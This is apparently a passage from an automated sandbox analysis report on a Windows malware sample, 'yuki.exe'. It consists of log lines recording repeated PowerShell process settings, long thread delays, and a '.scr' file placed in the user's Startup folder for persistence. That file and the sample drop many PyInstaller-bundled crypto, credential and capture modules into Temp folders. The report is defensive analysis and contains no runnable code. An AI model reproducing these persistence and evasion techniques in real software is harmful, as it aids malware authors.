Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeThread delayed: delay time: 922337203685477
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7847Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1829Jump to behavior
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8003
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1194
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5962
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3672
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 7452
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 2034
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 9022
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 468
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 5908
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3743
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 8203
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 1355
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 6612
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWindow / User API: threadDelayed 3022
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_lzma.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_SHA384.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\unicodedata.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_aesni.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_des3.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Util\_strxor.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_BLAKE2b.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\_core\_multiarray_tests.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_webp.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_webp.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_overlapped.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_chacha20.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ofb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\lz4\_version.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\python312.dllJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\charset_normalizer\md__mypyc.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\win32\win32crypt.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_SHA224.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_elementtree.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_raw_blowfish.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\PIL\_imagingtk.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_lzma.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_asyncio.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Cipher\_Salsa20.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_ssl.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_MD2.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\mtrand.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\cv2\opencv_videoio_ffmpeg4100_64.dllJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\PublicKey\_ec_ws.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\PublicKey\_curve448.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\PIL\_imagingmath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_ctr.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\random\_mt19937.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_keccak.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\numpy\linalg\_umath_linalg.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\numpy\fft\_pocketfft_umath.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\_wmi.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Hash\_poly1305.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\Cryptodome\Cipher\_raw_cfb.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\psutil\_psutil_windows.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\Cryptodome\Hash\_MD4.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\zstandard\_cffi.cp312-win_amd64.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_decimal.pydJump to dropped file
Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ ? .scrDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI6482\_socket.pydJump to dropped file
Source: C:\Users\user\Desktop\yuki.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\_MEI62402\zstandard\backend_c.cp312-win_amd64.pydJump to dropped file
